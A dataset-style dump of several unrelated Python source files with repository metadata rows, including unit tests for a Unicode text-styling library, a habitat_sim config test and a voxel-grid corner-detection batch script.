        self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡")
    def test_672_bold_ital_greek(self) -> None:
        uni = unicoder.bold(
            unicoder.ital(unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)))
        self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡")
    def test_673_bold_ital_greek(self) -> None:
        uni = unicoder.bold(
            unicoder.greek(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz)))
        self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻")
    def test_674_bold_ital_greek(self) -> None:
        uni = unicoder.ital(
            unicoder.greek(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz)))
        self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻")
    def test_675_bold_ital_greek(self) -> None:
        uni = unicoder.bold(
            unicoder.ital(unicoder.greek(base_abcdefghijklmnopqrstuvwxyz)))
        self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻")
    def test_680_norm_greek(self) -> None:
        uni = unicoder.convert("greek", ":foobar")
        self.assertEqual(uni, ":φωβαρ")
    def test_681_norm_greek(self) -> None:
        uni = unicoder.convert("greek", ":FOOBAR")
        self.assertEqual(uni, ":ΦΩΒΑΡ")
    def test_682_norm_greek(self) -> None:
        uni = unicoder.convert("boldgreek", ":foobar")
        self.assertEqual(uni, ":𝛗𝛚𝛃𝛂𝛒")
    def test_683_norm_greek(self) -> None:
        uni = unicoder.convert("boldgreek", ":FOOBAR")
        self.assertEqual(uni, ":𝚽𝛀𝚩𝚨𝚸")
    def test_684_norm_greek(self) -> None:
        uni = unicoder.convert("italgreek", ":foobar")
        self.assertEqual(uni, ":𝜑𝜔𝛽𝛼𝜌")
    def test_685_norm_greek(self) -> None:
        uni = unicoder.convert("italgreek", ":FOOBAR")
        self.assertEqual(uni, ":𝛷𝛺𝛣𝛢𝛲")
    def test_686_norm_greek(self) -> None:
        uni = unicoder.convert("italboldgreek", ":foobar")
        self.assertEqual(uni, ":𝝋𝝎𝜷𝜶𝝆")
    def test_687_norm_greek(self) -> None:
        uni = unicoder.convert("italboldgreek", ":FOOBAR")
        self.assertEqual(uni, ":𝜱𝜴𝜝𝜜𝜬")
    def test_690_norm_greek(self) -> None:
        uni = unicoder.greek(":foobar")
        self.assertEqual(uni, ":φωβαρ")
    def test_691_norm_greek(self) -> None:
        uni = unicoder.greek(":FOOBAR")
        self.assertEqual(uni, ":ΦΩΒΑΡ")
    def test_692_norm_greek(self) -> None:
        uni = unicoder.greek(unicoder.bold(":foobar"))
        self.assertEqual(uni, ":𝛗𝛚𝛃𝛂𝛒")
    def test_693_norm_greek(self) -> None:
        uni = unicoder.greek(unicoder.bold(":FOOBAR"))
        self.assertEqual(uni, ":𝚽𝛀𝚩𝚨𝚸")
    def test_694_norm_greek(self) -> None:
        uni = unicoder.greek(unicoder.ital(":foobar"))
        self.assertEqual(uni, ":𝜑𝜔𝛽𝛼𝜌")
    def test_695_norm_greek(self) -> None:
        uni = unicoder.greek(unicoder.ital(":FOOBAR"))
        self.assertEqual(uni, ":𝛷𝛺𝛣𝛢𝛲")
    def test_696_norm_greek(self) -> None:
        uni = unicoder.greek(unicoder.ital(unicoder.bold(":foobar")))
        self.assertEqual(uni, ":𝝋𝝎𝜷𝜶𝝆")
    def test_697_norm_greek(self) -> None:
        uni = unicoder.greek(unicoder.ital(unicoder.bold(":FOOBAR")))
        self.assertEqual(uni, ":𝜱𝜴𝜝𝜜𝜬")
    def test_698_norm_greek_notfound(self) -> None:
        old = unicoder.norm_greek_upper
        unicoder.norm_greek_upper = unicoder.norm_greek_lower
        uni = unicoder.greek(":FOOBAR")
        unicoder.norm_greek_upper = old
        self.assertEqual(uni, ":FOOBAR")
    def test_699_norm_greek_notfound(self) -> None:
        old = unicoder.norm_greek_lower
        unicoder.norm_greek_lower = unicoder.norm_greek_upper
        uni = unicoder.greek(unicoder.bold(":foobar"))
        unicoder.norm_greek_lower = old
        self.assertEqual(uni, ":foobar")
    #
    def test_700_norm_rune(self) -> None:
        uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz)
    def test_701_norm_rune(self) -> None:
        uni = unicoder.convert("rune", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ")
    def test_702_norm_rune(self) -> None:
        uni = unicoder.convert("futark", base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ")
    def test_703_norm_rune(self) -> None:
        uni = unicoder.convert("rune", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ")
    def test_704_norm_rune(self) -> None:
        uni = unicoder.convert("futark", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ")
    def test_705_norm_rune(self) -> None:
        uni = unicoder.rune(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ")
    def test_706_norm_rune(self) -> None:
        uni = unicoder.rune(base_abcdefghijklmnopqrstuvwxyz)
        self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ")
    def test_707_norm_rune(self) -> None:
        uni = unicoder.rune(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)
        self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ")
    def test_741_norm_rune_quaengeln(self) -> None:
        uni = unicoder.rune(":quaengeln")
        self.assertEqual(uni, ":ᚳᚨᛖᛜᛖᛚᚾ")
    def test_742_norm_rune_quaengeln(self) -> None:
        uni = unicoder.rune(":QUAENGELN")
        self.assertEqual(uni, ":ᚳᚨᛖᛜᛖᛚᚾ")
    def test_748_norm_rune_notfound(self) -> None:
        old = unicoder.norm_rune_lower
        unicoder.norm_rune_lower = unicoder.norm_greek_upper
        uni = unicoder.rune(":FOOBAR")
        unicoder.norm_rune_lower = old
        self.assertEqual(uni, ":foobar")
    def test_749_norm_rune_notfound(self) -> None:
        old = unicoder.norm_rune_lower
        unicoder.norm_rune_lower = unicoder.norm_greek_upper
        uni = unicoder.rune(":foobar")
        unicoder.norm_rune_lower = old
        self.assertEqual(uni, ":foobar")
    #
    def test_800_norm_value(self) -> None:
        txt = "15 km/h more"
        uni = unicoder.convert("fix", txt)
        self.assertEqual(uni, "15 km/h more")
        self.assertEqual(uni, txt)
    def test_801_thin_value(self) -> None:
        txt = "15 km/h more"
        uni = unicoder.convert("thin", txt)
        self.assertEqual(uni, "15 km/h more")
        self.assertNotEqual(uni, txt)
    def test_802_nobr_value(self) -> None:
        txt = "15 km/h more"
        uni = unicoder.convert("nobr", txt)
        self.assertEqual(uni, "15 km/h more")
        self.assertNotEqual(uni, txt)
        self.assertEqual(uni[2], ' ')
        self.assertEqual(uni[7], ' ')
        self.assertNotEqual(uni[2], uni[7])
    def test_803_thin_nobr_value(self) -> None:
        txt = "15 km/h more"
        thin = unicoder.convert("thin", txt)
        nobr = unicoder.convert("nobr", txt)
        self.assertEqual(thin, "15 km/h more")
        self.assertEqual(nobr, "15 km/h more")
        self.assertNotEqual(thin, nobr)
    def test_809_thin_value_command(self) -> None:
        txt = "15 km/h more"
        uni = unicoder.convert("1+", txt)
        self.assertEqual(uni, "1+ 15 km/h more")
        self.assertNotEqual(uni, txt)
    def test_900_norm_1_8(self) -> None:
        txt = "15 1/8 km/h more"
        uni = unicoder.convert("fix", txt)
        self.assertEqual(uni, "15 1/8 km/h more")
        self.assertEqual(uni, txt)
    def test_901_norm_1_8(self) -> None:
        txt = "15 1/8 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15⅛ km/h more")
        self.assertNotEqual(uni, txt)
    def test_902_norm_2_8(self) -> None:
        txt = "15 2/8 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15¼ km/h more")
        self.assertNotEqual(uni, txt)
    def test_903_norm_3_8(self) -> None:
        txt = "15 3/8 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15⅜ km/h more")
        self.assertNotEqual(uni, txt)
    def test_904_norm_4_8(self) -> None:
        txt = "15 4/8 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15½ km/h more")
        self.assertNotEqual(uni, txt)
    def test_905_norm_5_8(self) -> None:
        txt = "15 5/8 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15⅝ km/h more")
        self.assertNotEqual(uni, txt)
    def test_906_norm_6_8(self) -> None:
        txt = "15 6/8 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15¾ km/h more")
        self.assertNotEqual(uni, txt)
    def test_907_norm_7_8(self) -> None:
        txt = "15 7/8 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15⅞ km/h more")
        self.assertNotEqual(uni, txt)
    def test_911_norm_1_4(self) -> None:
        txt = "15 1/4 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15¼ km/h more")
        self.assertNotEqual(uni, txt)
    def test_912_norm_2_4(self) -> None:
        txt = "15 2/4 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15½ km/h more")
        self.assertNotEqual(uni, txt)
    def test_913_norm_3_4(self) -> None:
        txt = "15 3/4 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15¾ km/h more")
        self.assertNotEqual(uni, txt)
    def test_914_norm_1_2(self) -> None:
        txt = "15 1/2 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15½ km/h more")
        self.assertNotEqual(uni, txt)
    def test_920_norm_0_6(self) -> None:
        txt = "15 0/6 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15↉ km/h more")
        self.assertNotEqual(uni, txt)
    def test_921_norm_1_6(self) -> None:
        txt = "15 1/6 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15⅙ km/h more")
        self.assertNotEqual(uni, txt)
    def test_922_norm_2_6(self) -> None:
        txt = "15 2/6 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15⅓ km/h more")
        self.assertNotEqual(uni, txt)
    def test_923_norm_3_6(self) -> None:
        txt = "15 3/6 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15½ km/h more")
        self.assertNotEqual(uni, txt)
    def test_924_norm_4_6(self) -> None:
        txt = "15 4/6 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15⅔ km/h more")
        self.assertNotEqual(uni, txt)
    def test_925_norm_5_6(self) -> None:
        txt = "15 5/6 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15⅚ km/h more")
        self.assertNotEqual(uni, txt)
    def test_930_norm_0_3(self) -> None:
        txt = "15 0/3 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15↉ km/h more")
        self.assertNotEqual(uni, txt)
    def test_931_norm_1_3(self) -> None:
        txt = "15 1/3 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15⅓ km/h more")
        self.assertNotEqual(uni, txt)
    def test_932_norm_2_3(self) -> None:
        txt = "15 2/3 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "15⅔ km/h more")
        self.assertNotEqual(uni, txt)
    def test_941_norm_1_5(self) -> None:
        txt = "go 15 1/5 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "go 15⅕ km/h more")
        self.assertNotEqual(uni, txt)
    def test_942_norm_2_5(self) -> None:
        txt = "go 15 2/5 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "go 15⅖ km/h more")
        self.assertNotEqual(uni, txt)
    def test_943_norm_3_5(self) -> None:
        txt = "go 15 3/5 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "go 15⅗ km/h more")
        self.assertNotEqual(uni, txt)
    def test_944_norm_4_5(self) -> None:
        txt = "go 15 4/5 km/h more"
        uni = unicoder.convert("fract", txt)
        self.assertEqual(uni, "go 15⅘ km/h more")
        self.assertNotEqual(uni, txt)

if __name__ == "__main__":
    from optparse import OptionParser
    _o = OptionParser("%prog [options] test*",
                      epilog=__doc__.strip().split("\n")[0])
    _o.add_option("-v", "--verbose", action="count", default=0,
                  help="increase logging level [%default]")
    _o.add_option("--xmlresults", metavar="FILE", default=None,
                  help="capture results as a junit xml file [%default]")
    _o.add_option("-l", "--logfile", metavar="FILE", default="",
                  help="additionally save the output log to a file [%default]")
    opt, args = _o.parse_args()
    logging.basicConfig(level=logging.WARNING - opt.verbose * 5)
    #
    logfile = None
    if opt.logfile:
        if os.path.exists(opt.logfile):
            os.remove(opt.logfile)
        logfile = logging.FileHandler(opt.logfile)
        logfile.setFormatter(logging.Formatter("%(levelname)s:%(relativeCreated)d:%(message)s"))
        logging.getLogger().addHandler(logfile)
        logg.info("log diverted to %s", opt.logfile)
    xmlresults = None
    if opt.xmlresults:
        if os.path.exists(opt.xmlresults):
            os.remove(opt.xmlresults)
        xmlresults = open(opt.xmlresults, "w")
        logg.info("xml results into %s", opt.xmlresults)
    # unittest.main()
    suite = unittest.TestSuite()
    if not args:
        args = ["test_*"]
    for arg in args:
        for classname in sorted(globals()):
            if not classname.endswith("Test"):
                continue
            testclass = globals()[classname]
            for method in sorted(dir(testclass)):
                if "*" not in arg:
                    arg += "*"
                if arg.startswith("_"):
                    arg = arg[1:]
                if fnmatch(method, arg):
                    suite.addTest(testclass(method))
    # select runner
    if not logfile:
        if xmlresults:
            import xmlrunner  # type: ignore
            Runner = xmlrunner.XMLTestRunner
            result = Runner(xmlresults).run(suite)
        else:
            Runner = unittest.TextTestRunner
            result = Runner(verbosity=opt.verbose).run(suite)
    else:
        Runner = unittest.TextTestRunner
        if xmlresults:
            import xmlrunner
            Runner = xmlrunner.XMLTestRunner
        result = Runner(logfile.stream, verbosity=opt.verbose).run(suite)  # type: ignore
    if not result.wasSuccessful():
        sys.exit(1)
51.5512
96
0.684322
7,505
64,439
5.751366
0.086076
0.125799
0.137198
0.12237
0.910504
0.89753
0.88736
0.849087
0.788342
0.724469
0
0.050005
0.194975
64,439
1,249
97
51.592474
0.769099
0.002048
0
0.443173
0
0
0.136055
0.080612
0
0
0
0
0.324612
1
0.271464
false
0
0.006541
0
0.278823
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
7
951dcab76b4e83c6f29102e6a688fe7d511a8ad3
318
py
Python
tests/test_configs.py
shacklettbp/habitat-sim
1d5f7a4a3bfc30b620cf99f75a09db124b7aa1a5
[ "MIT" ]
1
2021-04-27T01:33:38.000Z
2021-04-27T01:33:38.000Z
tests/test_configs.py
shacklettbp/habitat-sim
1d5f7a4a3bfc30b620cf99f75a09db124b7aa1a5
[ "MIT" ]
null
null
null
tests/test_configs.py
shacklettbp/habitat-sim
1d5f7a4a3bfc30b620cf99f75a09db124b7aa1a5
[ "MIT" ]
null
null
null
import habitat_sim


def test_config_eq():
    cfg1 = habitat_sim.Configuration(
        habitat_sim.SimulatorConfiguration(), [habitat_sim.AgentConfiguration()]
    )
    cfg2 = habitat_sim.Configuration(
        habitat_sim.SimulatorConfiguration(), [habitat_sim.AgentConfiguration()]
    )
    assert cfg1 == cfg2
24.461538
80
0.716981
30
318
7.3
0.433333
0.319635
0.210046
0.273973
0.757991
0.757991
0.757991
0.757991
0.757991
0
0
0.015444
0.185535
318
12
81
26.5
0.830116
0
0
0.222222
0
0
0
0
0
0
0
0
0.111111
1
0.111111
false
0
0.111111
0
0.222222
0
0
0
0
null
1
1
1
0
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
1f1ada7c8ce8c23eeadc94368aba1d842ba91b9e
110
py
Python
src/pypkg_m7rap/mod.py
goerz/pypkg_m7ra
dc166b467d15860f353f3c23a4bed8d2bbe7ecfa
[ "MIT" ]
5
2019-12-26T15:55:34.000Z
2021-08-03T03:33:47.000Z
src/pypkg_m7rap/mod.py
goerz/pypkg_m7ra
dc166b467d15860f353f3c23a4bed8d2bbe7ecfa
[ "MIT" ]
15
2019-04-25T05:24:05.000Z
2021-03-19T01:57:12.000Z
src/pypkg_m7rap/mod.py
goerz/pypkg_m7ra
dc166b467d15860f353f3c23a4bed8d2bbe7ecfa
[ "MIT" ]
1
2020-01-01T16:35:06.000Z
2020-01-01T16:35:06.000Z
"""Sub-module of the package.""" def hello_world(): """Print "Hello World".""" print("Hello World")
15.714286
32
0.590909
14
110
4.571429
0.642857
0.46875
0.46875
0.625
0.625
0
0
0
0
0
0
0
0.190909
110
6
33
18.333333
0.719101
0.427273
0
0
0
0
0.211538
0
0
0
0
0
0
1
0.5
true
0
0
0
0.5
0.5
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
0
0
1
0
8
1f57dbff931d4e33402d912aad8352c883efc7fc
8,396
py
Python
bvpl/coexist/pair_corners.py
mirestrepo/voxels-at-lems
df47d031653d2ad877a97b3c1ea574b924b7d4c2
[ "BSD-2-Clause" ]
2
2015-09-18T00:17:16.000Z
2019-02-06T04:41:29.000Z
bvpl/coexist/pair_corners.py
mirestrepo/voxels-at-lems
df47d031653d2ad877a97b3c1ea574b924b7d4c2
[ "BSD-2-Clause" ]
null
null
null
bvpl/coexist/pair_corners.py
mirestrepo/voxels-at-lems
df47d031653d2ad877a97b3c1ea574b924b7d4c2
[ "BSD-2-Clause" ]
null
null
null
# Script to run find 2d corners on appearance grid
# Author : Isabel Restrepo
# 8-31-2009

import bvpl_batch
import time
import os
import sys

# time.sleep(30)

bvpl_batch.register_processes()
bvpl_batch.register_datatypes()

class dbvalue:
    def __init__(self, index, type):
        self.id = index    # unsigned integer
        self.type = type   # string

find_corners = 1
load_corners = 0
pair_corners = 1
save_corners_vrml = 0
save_pairs_vrml = 0
save_centers_vrml = 0

corner_length = 3
corner_width = 3
corner_thickness = 1

data_dir = sys.argv[1]
output_dir = sys.argv[2]
directions = sys.argv[3]
num_corners = int(sys.argv[4])

print("Data Dir")
print(data_dir)
print("Output Dir")
print(output_dir)

if not os.path.isdir(output_dir + "/"):
    os.mkdir(output_dir + "/")

if (find_corners):
    print("Load Voxel Grid")
    bvpl_batch.init_process("bvxmLoadGridProcess")
    bvpl_batch.set_input_string(0, data_dir + "/KL_gaussf1.vox")
    bvpl_batch.set_input_string(1, "bsta_gauss_f1")
    bvpl_batch.run_process()
    (world_id, world_type) = bvpl_batch.commit_output(0)
    app_grid = dbvalue(world_id, world_type)

    print("Load Voxel Grid")
    bvpl_batch.init_process("bvxmLoadGridProcess")
    bvpl_batch.set_input_string(0, data_dir + "/ocp.vox")
    bvpl_batch.set_input_string(1, "float")
    bvpl_batch.run_process()
    (world_id, world_type) = bvpl_batch.commit_output(0)
    ocp_grid = dbvalue(world_id, world_type)

    print("Creating corner 2d kernel")
    bvpl_batch.init_process("bvplCreateCorner2dKernelVectorProcess")
    bvpl_batch.set_input_unsigned(0, corner_length)     # half length
    bvpl_batch.set_input_unsigned(1, corner_width)      # half width
    bvpl_batch.set_input_unsigned(2, corner_thickness)  # half thickness
    bvpl_batch.set_input_string(3, directions)
    bvpl_batch.run_process()
    (kernel_id, kernel_type) = bvpl_batch.commit_output(0)
    corners_kernel_vector = dbvalue(kernel_id, kernel_type)

    print("Running Kernels")
    bvpl_batch.init_process("bvplOperateOcpAndAppProcess")
    bvpl_batch.set_input_from_db(0, ocp_grid)
    bvpl_batch.set_input_from_db(1, app_grid)
    bvpl_batch.set_input_from_db(2, corners_kernel_vector)
    bvpl_batch.set_input_string(3, "find_surface")
    bvpl_batch.set_input_string(4, "positive_gauss_convolution")
    bvpl_batch.set_input_string(5, output_dir + "/corners_resp.vox")
    bvpl_batch.set_input_string(6, output_dir + "/corners_id.vox")
    bvpl_batch.run_process()
    (all_resp_grid_id, all_resp_grid_type) = bvpl_batch.commit_output(0)
    all_resp_grid = dbvalue(all_resp_grid_id, all_resp_grid_type)
    (all_id_grid_id, all_id_grid_type) = bvpl_batch.commit_output(1)
    all_id_grid = dbvalue(all_id_grid_id, all_id_grid_type)

    print("Getting top response")
    bvpl_batch.init_process("bvplExtractTopResponseProcess")
    bvpl_batch.set_input_from_db(0, all_resp_grid)
    bvpl_batch.set_input_from_db(1, all_id_grid)
    bvpl_batch.set_input_unsigned(2, 0)
    bvpl_batch.set_input_string(3, output_dir + "/corners_top_resp.vox")
    bvpl_batch.set_input_string(4, output_dir + "/corners_top_id.vox")
    bvpl_batch.run_process()
    (response_grid_id, response_grid_type) = bvpl_batch.commit_output(0)
    response_grid = dbvalue(response_grid_id, response_grid_type)
    (id_grid_id, id_grid_type) = bvpl_batch.commit_output(1)
    id_grid = dbvalue(id_grid_id, id_grid_type)

    print("Writing Response Grid")
    bvpl_batch.init_process("bvxmSaveGridRawProcess")
    bvpl_batch.set_input_from_db(0, response_grid)
    bvpl_batch.set_input_string(1, output_dir + "/corners_top_resp.raw")
    bvpl_batch.run_process()

if load_corners:
    print("Load Voxel Grid")
    bvpl_batch.init_process("bvxmLoadGridProcess")
    bvpl_batch.set_input_string(0, output_dir + "/corners_top_resp.vox")
    bvpl_batch.set_input_string(1, "float")
    bvpl_batch.run_process()
    (response_grid_id, response_grid_type) = bvpl_batch.commit_output(0)
    response_grid = dbvalue(response_grid_id, response_grid_type)

    print("Load Voxel Grid")
    bvpl_batch.init_process("bvxmLoadGridProcess")
    bvpl_batch.set_input_string(0, output_dir + "/corners_top_id.vox")
    bvpl_batch.set_input_string(1, "int")
    bvpl_batch.run_process()
    (id_grid_id, id_grid_type) = bvpl_batch.commit_output(0)
    id_grid = dbvalue(id_grid_id, id_grid_type)

    print("Creating corner 2d kernel")
    bvpl_batch.init_process("bvplCreateCorner2dKernelVectorProcess")
    bvpl_batch.set_input_unsigned(0, corner_length)     # half length
    bvpl_batch.set_input_unsigned(1, corner_width)      # half width
    bvpl_batch.set_input_unsigned(2, corner_thickness)  # half thickness
    bvpl_batch.set_input_string(3, directions)
    bvpl_batch.run_process()
    (kernel_id, kernel_type) = bvpl_batch.commit_output(0)
    corners_kernel_vector = dbvalue(kernel_id, kernel_type)

if pair_corners:
    print("Creating kernels to search for corners")
    bvpl_batch.init_process("bvplCreateWCKernelVectorProcess")
    bvpl_batch.set_input_int(0, -2)  # min length
    bvpl_batch.set_input_int(1, 2)   # max length
    bvpl_batch.set_input_int(2, 0)   # min width
    bvpl_batch.set_input_int(3, 7)   # max width
    bvpl_batch.set_input_int(4, -2)  # min thickness
    bvpl_batch.set_input_int(5, 2)   # max thickness
    bvpl_batch.set_input_string(6, directions)
    bvpl_batch.run_process()
    (kernel_id, kernel_type) = bvpl_batch.commit_output(0)
    wc_kernel_vector = dbvalue(kernel_id, kernel_type)

    print("Searching for corners")
    bvpl_batch.init_process("bvplFindCornerPairsProcess")
    bvpl_batch.set_input_from_db(0, id_grid)
    bvpl_batch.set_input_from_db(1, response_grid)
    bvpl_batch.set_input_from_db(2, wc_kernel_vector)
    bvpl_batch.set_input_from_db(3, corners_kernel_vector)
    bvpl_batch.set_input_string(4, output_dir + "/pair_centers.vox")
    bvpl_batch.run_process()
    (pairs_id, pairs_type) = bvpl_batch.commit_output(0)
    pairs = dbvalue(pairs_id, pairs_type)
    (pairs_id, pairs_type) = bvpl_batch.commit_output(1)
    pairs_grid = dbvalue(pairs_id, pairs_type)

if save_corners_vrml:
    print("Converting ID to Hue ")
    bvpl_batch.init_process("bvplConvertIdToHueProcess")
    bvpl_batch.set_input_from_db(0, id_grid)
    bvpl_batch.set_input_from_db(1, response_grid)
    bvpl_batch.set_input_from_db(2, corners_kernel_vector)
    bvpl_batch.set_input_string(3, output_dir + "/hue_KL.vox")
    bvpl_batch.set_input_string(4, output_dir + "/hue_KL.svg")
    bvpl_batch.run_process()
    (hue_grid_id, hue_grid_type) = bvpl_batch.commit_output(0)
    hue_grid = dbvalue(hue_grid_id, hue_grid_type)

    print("Writing Orientation Grid")
    bvpl_batch.init_process("bvxmSaveRGBAGridVrmlProcess")
    bvpl_batch.set_input_from_db(0, hue_grid)
    bvpl_batch.set_input_float(1, 0.0)
    bvpl_batch.set_input_string(2, output_dir + "/all_lines.wrl")
    bvpl_batch.run_process()

if save_centers_vrml:
    print("Converting ID to Hue ")
    bvpl_batch.init_process("bvplConvertPairToHueProcess")
    bvpl_batch.set_input_from_db(0, pairs_grid)
    bvpl_batch.set_input_from_db(1, corners_kernel_vector)
    bvpl_batch.set_input_string(2, output_dir + "/hue_centers_KL.vox")
    bvpl_batch.set_input_string(3, output_dir + "/hue_KL.svg")
    bvpl_batch.run_process()
    (hue_grid_id, hue_grid_type) = bvpl_batch.commit_output(0)
    centers_hue_grid = dbvalue(hue_grid_id, hue_grid_type)

    print("Writing Orientation Grid")
    bvpl_batch.init_process("bvxmSaveRGBAGridVrmlProcess")
    bvpl_batch.set_input_from_db(0, centers_hue_grid)
    bvpl_batch.set_input_float(1, 0.0)
    bvpl_batch.set_input_string(2, output_dir + "/all_lines.wrl")
    bvpl_batch.run_process()

if save_pairs_vrml:
    hue = 0.0
    print("Visualize pairs")
    bvpl_batch.init_process("bvplVisualizeCornerPairsProcess")
    bvpl_batch.set_input_from_db(0, pairs)
    bvpl_batch.set_input_unsigned(1, 0)
    bvpl_batch.set_input_string(2, output_dir + "/all_lines.wrl")
    bvpl_batch.set_input_bool(3, 0)
    bvpl_batch.set_input_float(4, hue)
    bvpl_batch.run_process()
    hue = hue + 1.0 / float(num_corners)
    for i in range(1, num_corners, 1):
        print(i)
        print("Visualize pairs")
        bvpl_batch.init_process("bvplVisualizeCornerPairsProcess")
        bvpl_batch.set_input_from_db(0, pairs)
        bvpl_batch.set_input_unsigned(1, i)
        bvpl_batch.set_input_string(2, output_dir + "/all_lines.wrl")
        bvpl_batch.set_input_bool(3, 0)
        bvpl_batch.set_input_float(4, hue)
        bvpl_batch.run_process()
        hue = hue + 1.0 / float(num_corners)
8,396
8,396
0.770367
1,309
8,396
4.517189
0.098549
0.181126
0.135972
0.192626
0.798072
0.762895
0.703704
0.666836
0.579232
0.572975
0
0.017724
0.106241
8,396
1
8,396
8,396
0.770256
0.997142
0
0.446809
0
0
0.143262
0.057403
0
0
0
0
0
0
null
null
0
0.021277
null
null
0.117021
0
0
0
null
0
0
1
0
1
1
0
0
0
0
0
0
0
1
1
1
0
1
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
8
2f52a5e1d7053dd36a51342dfbaa8f617fcedc72
95
py
Python
src/magicdb/Models/__init__.py
CircleOnCircles/MagicDB
03fca4a2e4c75ad016a2338ac30f515393d20742
[ "MIT" ]
null
null
null
src/magicdb/Models/__init__.py
CircleOnCircles/MagicDB
03fca4a2e4c75ad016a2338ac30f515393d20742
[ "MIT" ]
null
null
null
src/magicdb/Models/__init__.py
CircleOnCircles/MagicDB
03fca4a2e4c75ad016a2338ac30f515393d20742
[ "MIT" ]
null
null
null
from magicdb.Models.MagicModel import MagicModel
from magicdb.Models.DateModel import DateModel
47.5
48
0.884211
12
95
7
0.5
0.261905
0.404762
0
0
0
0
0
0
0
0
0
0.073684
95
2
49
47.5
0.954545
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
2f60d6dfbb692223d2063c92fd3325b4e590d5b9
13,912
py
Python
SqltDAO/CrudMeister.py
soft9000/PyDAO
1316bdf34b62187b7763c2c7dd0036837cdcc894
